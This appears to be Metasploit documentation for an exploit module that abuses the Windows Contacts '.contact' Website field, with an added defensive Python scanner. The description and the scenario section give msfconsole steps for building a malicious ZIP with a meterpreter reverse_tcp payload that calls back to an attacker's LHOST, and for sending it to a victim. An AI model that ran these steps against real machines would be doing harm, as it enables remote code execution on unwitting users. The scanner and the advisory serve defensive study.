## Description

This module allows remote attackers to execute arbitrary code on vulnerable
installations of Microsoft Windows. User interaction is required to exploit
this vulnerability, in that the target must visit a malicious page or open a
malicious file. The flaw is due to the processing of the `<c:Url>` node
parameter in ".contact" files, which is expected to hold a website value;
however, if an attacker references an executable file instead, it will be run
without warning, instead of performing the expected web navigation. This is
dangerous and would be unexpected to an end user.

Executable files can live in a sub-directory, so when the ".contact" website link
is clicked it traverses directories towards the executable and runs it. Making
matters worse, if the files are compressed and then downloaded, "mark of the
web" (MOTW) may not work as expected with certain archive utilities.
The "." characters allow directory traversal to occur in order to run the
attacker-supplied executable sitting unseen in the attacker's directory. This
advisory is a duplicate of an issue that currently affects Windows .VCF files,
and is released for the sake of completeness as it affects Windows .contact
files as well.
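The description above reduces to one check a defender can automate: the `<c:Url>` value in a .contact file is expected to be a web address, and anything else (a bare relative path, backslash separators, a `..` traversal, an executable extension) is exactly what the viewer should never launch. The Python below is an added example, not code from the Metasploit module or its documentation. It parses a .contact document with the standard library and flags such values, and it also triages a ZIP archive of the shape the verification steps describe (a .contact file beside an executable in a sub-folder) in memory, without extracting it. The namespace URI and element names (`c:UrlCollection`, `c:Url`, `c:Value`) are assumed to match the Windows Contacts schema and should be checked against a real file; every sample document and archive here is constructed.

```python
"""Added example: a defensive scanner for Windows ".contact" files.

Not code from the Metasploit module. It flags <c:Url> values that are not plain
http/https web addresses, and triages a ZIP archive in memory. The namespace
URI and element names are assumed to match the Windows Contacts schema; all
sample data is constructed.
"""
import io
import re
import xml.etree.ElementTree as ET
import zipfile
from typing import Dict, List
from urllib.parse import urlparse
from xml.sax.saxutils import escape

# Namespace used by Windows Contacts .contact documents (assumption, see above).
CONTACT_NS = "http://schemas.microsoft.com/Contact"
NS = {"c": CONTACT_NS}

# File types Windows launches directly when such a path is opened.
EXECUTABLE_EXTENSIONS = (".exe", ".com", ".bat", ".cmd", ".scr", ".pif",
                         ".vbs", ".js", ".hta", ".ps1", ".lnk")


def classify_url(value: str) -> List[str]:
    """Return the reasons a <c:Url> value is not a plain web address.

    An empty list means the value is an ordinary http/https URL with a host.
    """
    reasons = []
    stripped = value.strip()
    parsed = urlparse(stripped)
    if parsed.scheme.lower() not in ("http", "https"):
        reasons.append(f"scheme is not http/https ({parsed.scheme or 'none'})")
    if not parsed.netloc:
        reasons.append("no host component; value is a bare path, not a web address")
    if "\\" in stripped:
        reasons.append("contains backslash path separators")
    if re.search(r"(^|[\\/])\.\.($|[\\/])", stripped):
        reasons.append("contains '..' directory traversal")
    if stripped.lower().endswith(EXECUTABLE_EXTENSIONS):
        reasons.append("points at an executable file type")
    return reasons


def scan_contact_xml(xml_text: str) -> List[Dict]:
    """Parse one .contact document and report on every <c:Url> entry."""
    root = ET.fromstring(xml_text)
    findings = []
    for url_node in root.iterfind(".//c:UrlCollection/c:Url", NS):
        value_node = url_node.find("c:Value", NS)
        value = (value_node.text or "") if value_node is not None else ""
        findings.append({"value": value, "reasons": classify_url(value)})
    return findings


def is_suspicious(xml_text: str) -> bool:
    """True when any URL entry in the document would not open a website."""
    return any(f["reasons"] for f in scan_contact_xml(xml_text))


def scan_zip_bytes(data: bytes) -> Dict:
    """Triage a ZIP (e.g. an e-mail attachment) in memory, without extracting.

    Lists executable members and the findings for each .contact member, so the
    pairing the advisory describes is visible before anyone clicks anything.
    """
    report = {"executables": [], "contacts": {}}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            lower = name.lower()
            if lower.endswith(EXECUTABLE_EXTENSIONS):
                report["executables"].append(name)
            elif lower.endswith(".contact"):
                report["contacts"][name] = scan_contact_xml(zf.read(name).decode("utf-8"))
    return report


def make_contact(url_value: str) -> str:
    """Constructed minimal .contact document with a single URL entry."""
    return f"""<?xml version="1.0" encoding="UTF-8"?>
<c:contact c:Version="1" xmlns:c="{CONTACT_NS}">
  <c:NameCollection>
    <c:Name c:ElementID="n1"><c:FormattedName>John Smith</c:FormattedName></c:Name>
  </c:NameCollection>
  <c:UrlCollection>
    <c:Url c:ElementID="u1">
      <c:Value>{escape(url_value)}</c:Value>
      <c:LabelCollection><c:Label>Business</c:Label></c:LabelCollection>
    </c:Url>
  </c:UrlCollection>
</c:contact>"""


BENIGN_CONTACT = make_contact("https://www.example.com/")
# Constructed value of the kind described above: a relative path to an
# executable in a sub-folder rather than a web address.
SUSPICIOUS_CONTACT = make_contact(r"http\payload.exe")


def make_sample_zip() -> bytes:
    """Constructed archive of the shape step 8 describes: one .contact file
    plus a placeholder (non-functional) executable name in an `http` folder."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("John Smith.contact", SUSPICIOUS_CONTACT)
        zf.writestr("http/payload.exe", b"placeholder bytes, not a program")
    return buf.getvalue()


if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_CONTACT), ("suspicious", SUSPICIOUS_CONTACT)):
        for finding in scan_contact_xml(doc):
            print(label, repr(finding["value"]), finding["reasons"] or "ok")
    print(scan_zip_bytes(make_sample_zip()))
```

The scanner deliberately treats "no http/https scheme with a host" as the primary signal rather than matching a particular malicious string: the advisory's point is that the viewer launches whatever the value resolves to, so any value that is not a web address is the defect being exercised. Running it over attachments before they reach a user, or over an extracted folder that contains a `.contact` file next to an executable, surfaces the pairing the MOTW caveat above warns may otherwise go unflagged.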

## Vulnerable Application

Windows Contacts
(tested on Windows 10.0.18282)

## Verification Steps

1. `./msfconsole`
2. `use exploit/windows/fileformat/microsoft_windows_contact`
3. Configure the payload. For example: `set PAYLOAD windows/x64/meterpreter/bind_tcp`
4. Configure the payload parameters. For example: `set LHOST 192.168.1.1`
5. Enter the name of the user to be embedded in the contact, which will also be used as the filename for the .ZIP and .CONTACT files. For example: `set FILENAME John Smith`
6. Enter the fake URL that the user must click to launch the payload. Note that this does not need to be a valid domain. For example: `set WEBSITE metasploit.com`
7. `run`
8. Confirm the ZIP file was created, and that it contains a `.CONTACT` file along with a payload in the `http` folder.

## Scenarios

### Exploiting a Windows 10 host

1. Configure the module-specific settings.

```
msf5 exploit(windows/fileformat/microsoft_windows_contact) > set WEBSITE metasploit.com
WEBSITE => metasploit.com
msf5 exploit(windows/fileformat/microsoft_windows_contact) > set FILENAME John Smith
FILENAME => John Smith
```

2. Configure the payload.

```
msf5 exploit(windows/fileformat/microsoft_windows_contact) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/fileformat/microsoft_windows_contact) > set LHOST 192.168.1.148
LHOST => 192.168.1.148
msf5 exploit(windows/fileformat/microsoft_windows_contact) > run

[+] Creating 'John Smith.zip'
```

3. Send the ZIP to the target machine.

4. On the target machine, extract the ZIP file, open the .CONTACT file in the Windows Contacts viewer, and click the URL in the "Website" field.